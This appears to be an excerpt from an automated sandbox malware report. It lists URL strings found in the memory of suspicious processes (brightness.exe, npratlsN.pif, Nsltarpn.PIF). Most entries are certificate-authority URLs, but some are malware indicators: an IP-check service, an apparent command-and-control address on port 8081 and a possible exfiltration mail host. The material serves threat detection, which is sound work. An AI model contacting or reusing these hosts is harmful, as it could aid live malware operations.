          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: npratlsN.pif, 00000012.00000002.3075519147.00000000208E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028AA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.0000000034231000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000208E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: npratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
          Source: brightness.exe, 00000004.00000002.1894871858.00000000205E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1851010321.000000007EDDA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1898124389.00000000215FA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1846267293.000000007F3EF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899037932.0000000021850000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif.4.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
          Source: npratlsN.pif, 0000000E.00000002.3095136706.00000000368D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.verisign.
          Source: npratlsN.pif, 0000000E.00000002.3095136706.00000000368D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.verisign.P
          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028CA4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002AFE0000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002B061000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028C99000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.000000003439B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095136706.0000000036908000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343A8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2537641479.0000000036921000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A9B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.000000002373D000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616339150.0000000023771000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.00000000236D3000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616496308.000000001EB14000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A8F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3074389278.000000001EAE5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616394581.000000002373D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e6.i.lencr.org/0
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028CA4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002AFE0000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002B061000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028C99000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028B72000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.000000003439B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095136706.0000000036908000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343A8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3080226661.0000000032432000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2537641479.0000000036921000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A9B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.000000002373D000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616339150.0000000023771000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.00000000236D3000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616496308.000000001EB14000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A8F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3074389278.000000001EAE5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616394581.000000002373D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://e6.o.lencr.org0
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028CA4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028C89000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.000000003439B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343A8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A9B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.irco.com.sa
          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: brightness.exe, 00000004.00000002.1894871858.00000000205E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1851010321.000000007EDDA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1898124389.00000000215FA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1846267293.000000007F3EF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899037932.0000000021850000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif.4.drString found in binary or memory: http://ocsp.comodoca.com0$
          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
          Source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028AA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.0000000034231000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000208E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028AA1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.0000000034231000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000208E1000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
          Source: brightness.exe, 00000004.00000002.1894871858.00000000205E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1851010321.000000007EDDA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1898124389.00000000215FA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1846267293.000000007F3EF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899037932.0000000021850000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif.4.drString found in binary or memory: http://www.pmail.com0
          Source: npratlsN.pif, 0000000E.00000002.3080226661.0000000032432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lenc
          Source: npratlsN.pif, 00000008.00000002.3076785533.0000000028CA4000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002AFE0000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2447599727.000000002B08F000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002B061000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028C99000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3085404507.000000002AFFA000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086255438.000000002B092000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000003.2446942695.000000002B087000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.000000003439B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095136706.0000000036908000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343A8000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.2537641479.0000000036921000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616470680.0000000023763000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A9B000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.000000002373D000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088785726.00000000236D3000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616496308.000000001EB14000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020A8F000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3074389278.000000001EAE5000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2616394581.000000002373D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: npratlsN.pif, 00000012.00000003.2616394581.000000002373D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.or
